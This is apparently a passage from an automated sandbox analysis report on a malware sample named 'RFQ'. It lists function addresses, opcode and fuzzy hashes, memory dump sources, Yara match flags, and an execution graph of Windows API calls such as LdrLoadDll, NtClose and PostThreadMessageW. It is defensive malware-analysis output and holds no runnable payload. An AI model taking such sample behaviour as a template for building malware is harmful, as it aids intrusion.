                                                                                                        • Instruction ID: c14275c74830a06b8c839825858ca15fadbbcae3f7db03ff252e5d563eb7eb4d
                                                                                                        • Opcode Fuzzy Hash: 703903b9e28b21c77bd7108c5763f7ad840a867a3474a719931370cb1fdfe3e7
                                                                                                        • Instruction Fuzzy Hash: CFE1FCB4E001198FCB14DFA9C590AAEFBB2FF89305F24C56AD414AB356D731A941CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B55F0 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 65c9d87560cc008ceb34e6f4361aece6df60b1958634d7b59e2a203f82aba37b
                                                                                                        • Instruction ID: cc33b20c13e5c261f834eecc400fa0014179e373eb4828050cf7be21a1c29508
                                                                                                        • Opcode Fuzzy Hash: 65c9d87560cc008ceb34e6f4361aece6df60b1958634d7b59e2a203f82aba37b
                                                                                                        • Instruction Fuzzy Hash: 5CE1FBB4E002198FCB14DFA9C590AAEFBB2FF89315F24C16AD414A7356D731A941CF61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B51B8 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aed2b32eb88369b4422a7f7208df4b1a49ab98bebd9b3034d27d68ebfa0a5e3f
                                                                                                        • Instruction ID: f1064c68d75e45f077fc4814a6dd930e8d377d67b84a6157f556a4b0854afd48
                                                                                                        • Opcode Fuzzy Hash: aed2b32eb88369b4422a7f7208df4b1a49ab98bebd9b3034d27d68ebfa0a5e3f
                                                                                                        • Instruction Fuzzy Hash: 1BE1E9B4E011198FCB14DFA9C590AAEFBB2FF89305F24C16AD414AB356DB31A941CF61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072FD6A8 Relevance: .3, Instructions: 308COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 28c3ad34633bb38ff2d90ce8c1c2b59f7e555d96ddf73c538c0615b5312980d7
                                                                                                        • Instruction ID: 9588fd9db1aa257f2543b335c8e1f427431d5518ea66347dd1f57df72c8b4ecf
                                                                                                        • Opcode Fuzzy Hash: 28c3ad34633bb38ff2d90ce8c1c2b59f7e555d96ddf73c538c0615b5312980d7
                                                                                                        • Instruction Fuzzy Hash: 4BC150B47206068FDB24DB39C8A4BAEF3E6AF85300F148579D516CB3A0DB75E942CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072E4BF8 Relevance: .3, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2016994262.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72e0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9db90a6ba4107a7be513e11d05194d7dc977ef0bbc8976fc97521802b8314039
                                                                                                        • Instruction ID: 4428af529e364e31443ec7a32316cfab1e855b5f318a99d473cad840a4e24b30
                                                                                                        • Opcode Fuzzy Hash: 9db90a6ba4107a7be513e11d05194d7dc977ef0bbc8976fc97521802b8314039
                                                                                                        • Instruction Fuzzy Hash: D7D13635C2071A8ACB11EBB4D990A9DB7B1FF95300F50C79AE4497B214FB706AC9CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072E4BF7 Relevance: .3, Instructions: 262COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2016994262.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72e0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3186faf8c03fa750fe37d1d5d26bea7eead81bcca6c7c14848c9b51842bc6d3e
                                                                                                        • Instruction ID: f3c3c5e7d15c266419abc99daa79a954888ef38f194aaa3e1346553bc5338d03
                                                                                                        • Opcode Fuzzy Hash: 3186faf8c03fa750fe37d1d5d26bea7eead81bcca6c7c14848c9b51842bc6d3e
                                                                                                        • Instruction Fuzzy Hash: E3D12735C2071A8ACB11EB74DA90A9DB7B1FF95300F50C79AE4497B214FB706AC9CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 05180040 Relevance: .3, Instructions: 260COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6ac65a92127619fcc3e82fb33e37ec34bfbf958f155899062e8e6921e8717536
                                                                                                        • Instruction ID: d377a2f14768b0f67eb86c1fb8e348ee0d9f21979e7a115e1af8ac5d876da0a6
                                                                                                        • Opcode Fuzzy Hash: 6ac65a92127619fcc3e82fb33e37ec34bfbf958f155899062e8e6921e8717536
                                                                                                        • Instruction Fuzzy Hash: B2A19136E1021ADFCF19DFB4C8444AEB7B2FF89300B15456AE806AB261EB71E955CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 05180DF1 Relevance: .2, Instructions: 223COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 86a668f565a90004537426c0b752d0e3b4d3074f8c9df22afcf5770364e2ac8a
                                                                                                        • Instruction ID: fa70332e8734111347282fa9ad07aec289022520ca7b59d98fe7d858992bea9e
                                                                                                        • Opcode Fuzzy Hash: 86a668f565a90004537426c0b752d0e3b4d3074f8c9df22afcf5770364e2ac8a
                                                                                                        • Instruction Fuzzy Hash: 45C10DB2C8A7458BD7D0CF25E84C1A97BB1BF85328F934A09D3616B2E4DBB41466CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B7C28 Relevance: .1, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b48d29244157c232e424a2c33d8d1b4212a4aa454156e9c170704c15a4bd80d3
                                                                                                        • Instruction ID: efa3c8b61e2091c68ece7a0b3d8c335c08488ef9ee883a5e88913832330f51db
                                                                                                        • Opcode Fuzzy Hash: b48d29244157c232e424a2c33d8d1b4212a4aa454156e9c170704c15a4bd80d3
                                                                                                        • Instruction Fuzzy Hash: D0512BB0E002198BCB18CFA9C9915EEFBF2BF89344F24C16AD408A7356D7319941CFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072FEB00 Relevance: 16.4, Strings: 13, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                                                        • API String ID: 0-653184299
                                                                                                        • Opcode ID: 2fba17b20b5c75b2ed23a5f8a5be40da0f2637982d8cb641b5738fcf6d636b4b
                                                                                                        • Instruction ID: 05162fc379baedac76a8aafadc8c1ca161ad8b1a4e1f41f9e94023bc5412bff2
                                                                                                        • Opcode Fuzzy Hash: 2fba17b20b5c75b2ed23a5f8a5be40da0f2637982d8cb641b5738fcf6d636b4b
                                                                                                        • Instruction Fuzzy Hash: 17511B30A0110A9FCF0CEFB9FAA19DD7BB5FF40604B109568D0557B264DF35690ACBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.2%
                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                        Signature Coverage:6.8%
                                                                                                        Total number of Nodes:161
                                                                                                        Total number of Limit Nodes:16
                                                                                                        execution_graph 95253 423ba3 95254 423bb2 95253->95254 95263 426ee3 95254->95263 95256 423bf9 95268 42c913 95256->95268 95259 423bcb 95259->95256 95260 423c36 95259->95260 95262 423c3b 95259->95262 95261 42c913 RtlFreeHeap 95260->95261 95261->95262 95264 426f40 95263->95264 95265 426f77 95264->95265 95271 4238b3 95264->95271 95265->95259 95267 426f59 95267->95259 95278 42ada3 95268->95278 95270 423c05 95272 423857 95271->95272 95274 423860 95271->95274 95275 42aa43 95272->95275 95274->95267 95276 42aa60 95275->95276 95277 42aa71 NtClose 95276->95277 95277->95274 95279 42adc0 95278->95279 95280 42add1 RtlFreeHeap 95279->95280 95280->95270 95339 42a053 95340 42a06d 95339->95340 95343 1a72df0 LdrInitializeThunk 95340->95343 95341 42a095 95343->95341 95344 423813 95345 42382f 95344->95345 95346 423857 95345->95346 95347 42386b 95345->95347 95348 42aa43 NtClose 95346->95348 95349 42aa43 NtClose 95347->95349 95351 423860 95348->95351 95350 423874 95349->95350 95354 42ca33 RtlAllocateHeap 95350->95354 95353 42387f 95354->95353 95355 42d9f3 95356 42da03 95355->95356 95357 42da09 95355->95357 95358 42c9f3 RtlAllocateHeap 95357->95358 95359 42da2f 95358->95359 95281 413543 95282 41355d 95281->95282 95287 416eb3 95282->95287 95284 413578 95285 4135bd 95284->95285 95286 4135ac PostThreadMessageW 95284->95286 95286->95285 95288 416ed7 95287->95288 95289 416f13 LdrLoadDll 95288->95289 95290 416ede 95288->95290 95289->95290 95290->95284 95291 41a4c3 95292 41a507 95291->95292 95293 41a528 95292->95293 95294 42aa43 NtClose 95292->95294 95294->95293 95295 41d5c3 95297 41d5e9 95295->95297 95296 41d6dd 95297->95296 95304 42db23 95297->95304 95299 41d678 95299->95296 95300 41d6d4 95299->95300 95315 42a0a3 95299->95315 95300->95296 95310 427153 95300->95310 95303 41d787 95305 42da93 95304->95305 95309 42daf0 95305->95309 95319 42c9f3 95305->95319 95307 42dacd 95308 42c913 RtlFreeHeap 95307->95308 95308->95309 95309->95299 95311 4271b0 95310->95311 95312 4271eb 95311->95312 95325 417ea3 95311->95325 95312->95303 95314 4271cd 95314->95303 95316 42a0c0 95315->95316 95332 1a72c0a 95316->95332 95317 42a0ec 95317->95300 95322 42ad53 95319->95322 95321 42ca0e 95321->95307 95323 42ad6d 95322->95323 95324 42ad7e RtlAllocateHeap 95323->95324 95324->95321 95326 417e5e 95325->95326 95328 417e8b 95326->95328 95329 42adf3 95326->95329 95328->95314 95330 42ae10 95329->95330 95331 42ae21 ExitProcess 95330->95331 95331->95328 95333 1a72c11 95332->95333 95334 1a72c1f LdrInitializeThunk 95332->95334 95333->95317 95334->95317 95335 1a72b60 LdrInitializeThunk 95336 4180a8 95337 42aa43 NtClose 95336->95337 95338 4180b2 95337->95338 95360 401c7c 95361 401c91 95360->95361 95364 42deb3 95361->95364 95367 42c503 95364->95367 95368 42c529 95367->95368 95379 407463 95368->95379 95370 42c53f 95378 401cfe 95370->95378 95382 41a2d3 95370->95382 95372 42c55e 95373 42adf3 ExitProcess 95372->95373 95375 42c573 95372->95375 95373->95375 95393 426ac3 95375->95393 95376 42c582 95377 42adf3 ExitProcess 95376->95377 95377->95378 95397 415bf3 95379->95397 95381 407470 95381->95370 95383 41a2ff 95382->95383 95410 41a1c3 95383->95410 95386 41a344 95389 41a360 95386->95389 95391 42aa43 NtClose 95386->95391 95387 41a32c 95388 41a337 95387->95388 95390 42aa43 NtClose 95387->95390 95388->95372 95389->95372 95390->95388 95392 41a356 95391->95392 95392->95372 95394 426b1d 95393->95394 95396 426b2a 95394->95396 95421 417a03 95394->95421 95396->95376 95398 415c0a 95397->95398 95400 415c23 95398->95400 95401 42b493 95398->95401 95400->95381 95402 42b4ab 95401->95402 95403 426ee3 NtClose 95402->95403 95405 42b4c6 95403->95405 95404 42b4cf 95404->95400 95405->95404 95406 42a0a3 LdrInitializeThunk 95405->95406 95407 42b521 95406->95407 95408 42c913 RtlFreeHeap 95407->95408 95409 42b53a 95408->95409 95409->95400 95411 41a1dd 95410->95411 95415 41a2b9 95410->95415 95416 42a143 95411->95416 95414 42aa43 NtClose 95414->95415 95415->95386 95415->95387 95417 42a160 95416->95417 95420 1a735c0 LdrInitializeThunk 95417->95420 95418 41a2ad 95418->95414 95420->95418 95423 417a2d 95421->95423 95422 417e8b 95422->95396 95423->95422 95429 413663 95423->95429 95425 417b34 95425->95422 95426 42c913 RtlFreeHeap 95425->95426 95427 417b4c 95426->95427 95427->95422 95428 42adf3 ExitProcess 95427->95428 95428->95422 95430 41367f 95429->95430 95431 4137d3 95430->95431 95437 41379f 95430->95437 95438 4130c3 95430->95438 95431->95425 95433 4137b3 95433->95431 95442 41a5e3 NtClose RtlFreeHeap LdrInitializeThunk 95433->95442 95435 4137c9 95435->95425 95437->95431 95441 41a5e3 NtClose RtlFreeHeap LdrInitializeThunk 95437->95441 95443 42acb3 95438->95443 95441->95433 95442->95435 95444 42accd 95443->95444 95447 1a72c70 LdrInitializeThunk 95444->95447 95445 4130e5 95445->95437 95447->95445 95448 413cbf 95449 413c78 95448->95449 95450 413c09 95449->95450 95451 426ee3 NtClose 95449->95451 95452 413cff 95451->95452

                                                                                                        Executed Functions

                                                                                                        Function 0042AA43 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 69 42aa43-42aa7f call 404bd3 call 42bb03 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,?,00000000,k\A,?,00423860,k\A,494CA64B,?,?,?,?,?,?,00426F59), ref: 0042AA7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID: k\A
                                                                                                        • API String ID: 3535843008-2887163533
                                                                                                        • Opcode ID: 8992f114be1ba2a05a1850425414e7bbbe9c44187a3c2aaee730293ab117c9aa
                                                                                                        • Instruction ID: 605cfec049d23af46dbcb314774df478e3d821900ebe12abad8c6d86ba588624
                                                                                                        • Opcode Fuzzy Hash: 8992f114be1ba2a05a1850425414e7bbbe9c44187a3c2aaee730293ab117c9aa
                                                                                                        • Instruction Fuzzy Hash: 6FE04F356006147BD510EB6ADC45FDB776CDBC5714F004559FA08A7186DAB0B91086F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00416EB3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 83 416eb3-416edc call 42d613 86 416ee2-416ef0 call 42db33 83->86 87 416ede-416ee1 83->87 90 416f00-416f11 call 42bfd3 86->90 91 416ef2-416efd call 42ddd3 86->91 96 416f13-416f27 LdrLoadDll 90->96 97 416f2a-416f2d 90->97 91->90 96->97
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00416F25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: ff648a7789903fbada3fb52f9b5746c9afea51872dfecb5c18f95975c9bae672
                                                                                                        • Instruction ID: 40b39a719bf4947bc615ecc3e575a2c87d7cb42b9529f368f291647e28415aae
                                                                                                        • Opcode Fuzzy Hash: ff648a7789903fbada3fb52f9b5746c9afea51872dfecb5c18f95975c9bae672
                                                                                                        • Instruction Fuzzy Hash: DD0125B5E0020DABDF10DBE5DC42FDEB7789B54304F00819AE90897240F635EB55CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 112 1a72b60-1a72b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b25d68b4206a1da99587b08689d67484be433ef9254dca6cb1bf798a961ac2b6
                                                                                                        • Instruction ID: 8c277c403ad6720c05274daa22a92b7038a66fb338774bd60ee846c3becbde6c
                                                                                                        • Opcode Fuzzy Hash: b25d68b4206a1da99587b08689d67484be433ef9254dca6cb1bf798a961ac2b6
                                                                                                        • Instruction Fuzzy Hash: 9590026120240003410571584454616D00B97E0301F96C021E1014594DC92989916225
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 114 1a72df0-1a72dfc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 29bfb9e096d7b612a9e27e61d8deb0406608cf5d8914283bbe800f157b77b23f
                                                                                                        • Instruction ID: d664bdb7ec0bd7c758d481bd417416d6cd8e2bb63218bac346e4581aee4ed9bb
                                                                                                        • Opcode Fuzzy Hash: 29bfb9e096d7b612a9e27e61d8deb0406608cf5d8914283bbe800f157b77b23f
                                                                                                        • Instruction Fuzzy Hash: A490023120140413D11171584544707900A97D0341FD6C412A042455CDDA5A8A52A221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 113 1a72c70-1a72c7c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 424d91f9c1cd2fc7d771e0e38edad37dc7985c3a52ac449832f0021b6294b8a5
                                                                                                        • Instruction ID: fe22a100b9547a511de600de7a67f2ef366bd69cec6c757973cc8d8530eba1a7
                                                                                                        • Opcode Fuzzy Hash: 424d91f9c1cd2fc7d771e0e38edad37dc7985c3a52ac449832f0021b6294b8a5
                                                                                                        • Instruction Fuzzy Hash: 6F90023120148802D1107158844474A900697D0301F9AC411A442465CDCA9989917221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f4917dadc3cfcc6c4ee4f5abcd66be0397ae1058d41f53f40a57c5cd9b675ad7
                                                                                                        • Instruction ID: eb552fdd4cc7d6aae4a1e21c8f5fd362416ee8965cf9538c1d883c1145cec495
                                                                                                        • Opcode Fuzzy Hash: f4917dadc3cfcc6c4ee4f5abcd66be0397ae1058d41f53f40a57c5cd9b675ad7
                                                                                                        • Instruction Fuzzy Hash: 5490023160550402D10071584554706A00697D0301FA6C411A042456CDCB998A5166A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0041353B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: e708315332aaf9e9f5e9ba33ec9520207584772b3ed03077528bac634c00126f
                                                                                                        • Instruction ID: be9a613a0eda02378b01cee609e3b1e15a1b2fff95f298b4320ccd8f6e614275
                                                                                                        • Opcode Fuzzy Hash: e708315332aaf9e9f5e9ba33ec9520207584772b3ed03077528bac634c00126f
                                                                                                        • Instruction Fuzzy Hash: AD01A9B1D4015C7ADB00ABD19C82DEFBB7CDF40A94F058059F914B7141D6785F064BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00413543 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 15 413543-413562 call 42c9b3 18 413568-4135aa call 416eb3 call 404b43 call 423cb3 15->18 19 413563 call 42d3c3 15->19 26 4135ca-4135d0 18->26 27 4135ac-4135bb PostThreadMessageW 18->27 19->18 27->26 28 4135bd-4135c7 27->28 28->26
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: e6291a16a276211746444435edb1c88096d428be110825000bfd881225e1be02
                                                                                                        • Instruction ID: 22661a58ade3e44b7a514cd97cf3613d7ad26d7428119bd899b8f930f4e9f7ee
                                                                                                        • Opcode Fuzzy Hash: e6291a16a276211746444435edb1c88096d428be110825000bfd881225e1be02
                                                                                                        • Instruction Fuzzy Hash: D10188B2D4025C7ADB10EBD59C81DEFBB7CDF40A94F058059FA04B7241D6785F0647A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004134F9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 29 4134f9-413562 31 413568-4135aa call 416eb3 call 404b43 call 423cb3 29->31 32 413563 call 42d3c3 29->32 39 4135ca-4135d0 31->39 40 4135ac-4135bb PostThreadMessageW 31->40 32->31 40->39 41 4135bd-4135c7 40->41 41->39
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 64bf0ea5d276cd6bb004fdc4179936fb40e4037f021cc45dbb0ef43b953a3555
                                                                                                        • Instruction ID: 4a6e05ec9a38cb1a868d09b3fe28959a852823fdd71751c5284d48b8aa0c3a54
                                                                                                        • Opcode Fuzzy Hash: 64bf0ea5d276cd6bb004fdc4179936fb40e4037f021cc45dbb0ef43b953a3555
                                                                                                        • Instruction Fuzzy Hash: 330104B2D012587ADB019BA19C82CEFBF7CDE41A58B05C49AFD04A7101D27C8F468BE9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004134EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54threadwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
